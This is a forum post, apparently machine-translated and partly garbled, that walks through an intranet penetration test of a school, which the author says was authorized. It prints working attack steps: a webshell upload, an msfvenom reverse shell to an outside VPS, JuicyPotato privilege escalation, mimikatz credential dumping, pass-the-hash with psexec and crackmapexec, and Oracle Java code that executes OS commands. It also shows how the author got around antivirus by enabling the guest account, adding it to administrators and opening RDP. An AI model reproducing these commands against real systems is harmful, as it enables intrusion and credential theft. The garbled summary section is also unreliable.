Jump to content

Title: A penetration test for the school's intranet

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

0x00 Initial Exploration of Intranet

After applying to the teacher of the Information Center to authorize the school to conduct an intranet penetration test, I began to collect information on the in-use system in the school’s intranet. Most of them use the new version of the framework components that have not been exposed, which put my initial stewardship process to a deadlock. But after I revisited the various web systems that the school opened, I found some surprising systems.

1049983-20220119230524040-2137113811.png

The school used many new systems, but did not turn off the old system. After some search, it was confirmed that there was a vulnerability to upload any file in this old system.

1049983-20220119230524706-1372032726.png

Without any filtering, it can be said that it is just a bargain.

1049983-20220119230525271-768935209.png

And it also returns the path of the Trojan. But I encountered a very strange phenomenon. After connecting with an ant sword and a kitchen knife, the return path is different, and the files in it are also different.

1049983-20220119230525818-1052745570.png

Among them, the shell connected by the Ant Sword cannot upload files, but the shell connected by the Kitchen Knife can. And the webshell will block the IP after executing a command, and it is suspected that there is a waf. So I first pass a msf aspx Trojan to get a meterpreter session. Use windows-exploit-suggest to detect unpatched patches.

1049983-20220119230526469-167265034.png

I found that there is a very useful vulnerability of MS16-075. I directly cooperate with the juicy_potato module of msf to attack. Remember to modify the CLSID, you can find it here.

https://github.com/ohpe/juicy-potato/tree/master/CLSID

It is best to choose the forward connection of bind_tcp for payload, otherwise it may not pop up back the shell.

1049983-20220119230527015-1415985841.png

This way, system permissions are obtained. The next step is to collect information from the machine and obtain information that is helpful to our horizontal penetration. A strange thing is that this machine originally had a domain, but now it is gone and the domain control cannot be found. So our focus is on password collision library. Use the mimikatz module that comes with msf to get the password.

1049983-20220119230527769-1549308573.png

I bumped into two or three machines, and some of them had port 445, but did not have port 3389.

In this way, we can try using ms-17010, but considering that it may affect some systems in use, I chose to use a more secure psexec module to bump the library. That is, hash delivery. Sometimes when we encounter a password that cannot be obtained in plain text, we can consider dumping the hash value of the password, and then use the psexec module to hash delivery to conduct attacks. All we get are SYSTEM permissions.

The subsequent steps were boring, which was to constantly bump into the library to collect passwords, and then bump into the library through the collected passwords. After obtaining enough machines and passwords, the border router was found, but the passwords collected before could not be logged in successfully, so I had to give up. This network segment comes to an end.

0x01 In-depth exploration

After searching the new system, I found any file download vulnerability in one of the functions.

1049983-20220119230528298-1074002551.png

And it is a service initiated by the root user. The ideal situation is to read the /etc/shadow file and explode the root user password. (Failed), and then try to read /root/.bash_history to get the root user's operation history. It records the path to the tomcat deployment and the backup source code files. By downloading the source code to collect information, I collected a very critical information. Most of the machines in this network segment use oracle database and have not modified the SID. I still have several passwords to try.

After some explosion, it was found that the user password of an oracle database system was not modified and was a manager. Everyone should specify that the oracle database can execute system commands, and the system user fully meets the conditions for executing system commands. I found a tool online that removes the tedious steps and can execute commands directly.

1049983-20220119230528710-146235030.png

0x03 Bypassing the tinder behavior detection

But another strange problem occurred. I could only execute a few commands. Although I am a system user, once I use commands like net user, there is no echo. Later it was found that Turfur intercepted abnormal behavior. Then I tried to connect to the server directly using sqlplus in navicat. According to the steps online, I can determine whether the command is executed based on the 1 or 0 returned by the server.

create or replace and compile Java Source named 'OSCommand' as

-- java: OS COMMAND

import java.io.*;

import java.lang.*;

public class OSCommand{

public static String Run(String Command){

Runtime rt=Runtime.getRuntime();

int rc=-1;

try{

Process p=rt.exec( Command);

int bufSize=32000;

int len=0;

byte buffer[]=new byte[bufSize];

String s=null;

BufferedInputStream bis=new BufferedInputStream( p.getInputStream(), bufSize );

len=bis.read( buffer, 0, bufSize );

rc=p.waitFor();

if ( len !=-1 ){

s=new String( buffer, 0, len );

return( s );

}

return( rc+'' );

}

catch (Exception e){

e.printStackTrace();

return( '-1\ncommand[' + Command + ']\n' + e.getMessage() );

}

}

}

/

show errors

create or replace function OSexec( cCommand IN string ) return varchar2 is

-- function: OS EXEC

-- descr: PL/SQL wrapper for the Java OSCOMMAND stored proc

--

language JAVA

name 'OSCommand.Run(java.lang.String) return java.lang.String';

/

show errors

-- sysdba. Substitute SCOTT with the applicable schema that owns the OSEXEC

-- and OSCOMMAND stored procs.

declare

SCHEMA varchar2(30) :='SCOTT';

Begin

dbms_java.grant_permission(

SCHEMA,

'SYS:java.io.FilePermission',

'ALL FILES',

'execute'

);

dbms_java.grant_permission(

SCHEMA,

'SYS:java.lang.RuntimePermission',

'writeFileDescriptor',

'*'

);

dbms_java.grant_permission(

SCHEMA,

'SYS:java.lang.RuntimePermission',

'readFileDescriptor',

'*'

);

commit;

end;

/

-- View local connection information

SQL select OSexec('ipconfig') as STDOUT from dual;

STDOUT

--------------------------------------------------------------------------------

Windows IP ?

??l? 3:

l? DNS ? . .

?t? IPv6 ? . ************

IPv4 ? 192.168.100.100

? 255.255.255.0

? 0.0.0.0

--Activate the guest account

SQL select OSexec('cmd.exe /c net user guest /active:yes') as STDOUT from dual;

STDOUT

--------------------------------------------------------------------------------

0 Because there is antivirus software monitoring oracle behavior, it is necessary to combine some uninterrupted behaviors to attack.

What I didn't expect was that when I directly executed the command line to open port 3389, Turfur didn't intercept it. But when I execute net user and other commands, I can't execute it. At this time, I suddenly remembered the guest user. I enabled the guest user and joined the administrator group. This time I was not blocked. After directly connecting to the remote desktop, it fails when I want to use mimikatz on the machine or rebound a shell to the cs.

In addition, some permissions for guest users have been disabled, such as adding users and other sensitive operations. But when I was executing net user, I found a user, which I have seen on my previous machine and I have the password for this user. So use sqlplus to add this user to the administrator group.

Therefore, the behavioral rule of Turfur interception is that users cannot be added, but existing users can be added to the administrator group, and the guest user can be activated and can be opened 3389. After I logged in to this machine again, I still couldn't rebound the shell and came back, or read its password. At this time, my junior told me that you can turn on the turquoise directly and turn off the protection, and then you can rebound the shell. I?

Then I got the shell after one operation, but I still couldn't read the plain text password. I just thought about dumping the hash and then blasting it. But I remember that there is a foreign online website that can solve NTLM

https://www.objectif-securite.ch/ophcrack

1049983-20220119230529112-1621662799.png

After obtaining the password, it is the familiar library to collect information and then the library to crash.

Then I found an xftp saved the passwords of several servers on the server. At this time, I found a sarcastic operation. You can use the asterisk password viewer tool to view the password saved here.

1049983-20220119230529622-76334754.png

I also like to mention several root-authorized machines. I didn't want to play the exam later. I recorded all the collected passwords and then hit the machine in the entire network segment, causing many weak passwords.

1049983-20220119230530089-811474567.png

Congratulations to the information center teacher for working overtime.

0x04 Summary

1. At the attachment uploading location in the target's old system, you can directly upload a sentence Trojan and return to the uploaded path. 2. After connecting a sentence Trojan horse through an ant sword, you cannot upload files; while connecting a sentence through a kitchen knife can upload files. 3. Generate an aspx backdoor through msf on the public network, and upload the generated shell.aspx to the target site through Malaysia, and access shell.aspx. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=Public VPS LPORT=12345 -f aspx shell.aspx4. Listen through MSF and successfully obtain rebound shellmsf use exploit/multi/handlermsf exploit(handler) set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf exploit(handler) set LHOST Public VPSmsf exploit(handler) set LPORT 12345msf exploit(handler) exploit5. Execute systeminfo through the command terminal of the kitchen knife to execute patch information output info.txt, download it locally, use windows-exploit-suggester to find the available escalation POC as: MS16-075 (you can also find available pocs through online comparison :http://bugs.hacking8.com/tiquan/) https://github.com/1nf1n17yk1ng/Windows-Exploit-Suggester-Python3systeminfo info.txtpython3 windows-exploit-suggester.py --updatepython3 windows-exploit-suggester.py --database 2021-07-15-mssb.xls --systeminfo info.txt6. Passed by ms16-075 in MSF (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) meterpreter getuidServer username: IIS APPPOOL\DefaultAppPoolmeterpreter getprivsmeterpreter upload /root/potato.exe C:\Users\Publicmeterpreter cd C:\Users\Publicmeterpreter use incognitometerpreter list_tokens -umeterpreter execute -cH -f ./potato.exemeterpreter list_tokens -umeterpreter getuidServer username: NT AUTHORITY\SYSTEM7. Load mimikatz through msf to read plaintext and hash value meterpreter load mimikatzmeterpreter mimikatz_command -f samdump:hasMeterpreter mimikatz_command -f sekurlsa:searchPasswordsmeterpreter msv #get hash value meterpreter kerberos #get plaintext 8. Batch hash value collision library for pth pass

meterpreter upload /root/crackmapexec C:\Users\Publicmeterpreter crackmapexec 192.168.1.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7 or meterpreter backgroundmsfuse exploit/windows/smb/psexecmsf set payload windows/meterpreter/reverse_tcpmsfset LHOST 192.168.232.128msfset LPORT 2222msfset rhosts 10.206.14.1/24msfset smbuser administratorsmbuser=administratorsmbuser set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf run or msf use auxiliary/admin/smb/psexec_commandmsf et rhosts 10.206.14.1/24msf set smbuser administratorsf set smbpass aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657d3174 (Note that: lm hash can be any 32-bit characters) msf run4. I found a file download in the target's new system. I guess there may be any file download vulnerability. Here you can batch fuzz through bp's intruder function. Here you can read /etc/passwd and etc/shadow first, read the hash value and crack it through MD5. 5. Then download it through any file, read /root/.bash_histoy, and view the administrator's operation of the website directory for compression. The compressed package name and the root directory saved to the website are downloaded, and the source code is directly downloaded and backed up. 6. The oracle database configuration file was found in the source code, and the user name system and password were leaked and the IP address was 121.1.100.100 was leaked. Use the default sid value: orcl, and you can connect. Here you use oracleshell to remotely connect. 7. The command to add net username is intercepted through oracleshell, and the tasklist/svc is executed, and the target database is found to have tinder. However, by activating the gust account and adding gust to the administrator group Turf does not intercept it. Then turn on 3389 and not be intercepted net user guest /active:yesnet user guest Test@123net localgroup administrators guest /addREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f Or use sqlplus in navicat to connect to the server SQL select OSexec('ipconfig') as STDOUT from dual;S

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.